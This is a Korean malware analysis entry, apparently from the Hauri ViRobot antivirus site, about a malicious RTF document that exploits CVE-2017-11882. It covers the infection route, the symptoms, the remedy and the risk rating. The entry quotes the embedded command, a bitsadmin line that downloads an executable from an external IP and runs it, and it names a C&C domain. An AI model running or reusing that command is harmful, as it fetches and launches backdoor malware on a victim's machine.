HAURI

전체메뉴 열기

ViRobot Engine & Virus DB

최신 업데이트 현황과 악성코드 분석 정보 제공

악성코드 분석정보

RTF.S.Exploit.113890
바이로봇 버전정보 : 2018-08-17.01     활동 OS 플랫폼 : MS Windows     감염시 위험도 :
등록일 :
2018-09-21 11:49:22

    ■ RTF.S.Exploit.113890

       A. 감염 경로

           RTF.S.Exploit.113890는 자체적인 전파기능을 가지고 있지 않으며, 해킹 당한 사이트에서 다운로드 되거나 악성 메일을 통해 유포된다.

       B. 감염 증상

           1) RTF.S.Exploit.113890는 RTF구조를 가졌으며, 취약점(CVE-2017-11882)에 의해 만들어진 악성 문서 파일이다.

           2) RTF구조 내부에 OLE 객체 구조를 포함하고 있으며, 정상적으로 실행 시 OLE 구조에 포함되어 있는 명령코드가 동작하
              여 추가 악성코드를 다운받아오고 실행한다.

               cmd.exe /c bitsadmin /transfer hK /priority foreground https://103.20
              0.6.3:4560/mem.exe %USERPROFILE%\I.exe && start %USERPROFILE%\I.exe


[그림 1] OLE 객체 구조 내 명령코드


           3) 추가적으로 실행된 파일은 정상프로세스에 인젝션되어 동작하며, 백도어 기능을 수행하지만 현재는 주기적으로 통신이 이루어지는
              도메인 주소가 정상적으로 연결이 이루어지지 않아 추가적인 행위는 이루어지지 않는다.

              C&C 주소 : hkenngr.com

       C. 치료 방법

           바이로봇 2018-08-17.01 이상 버전으로 치료된다.

       D. 위험도

           보통

Top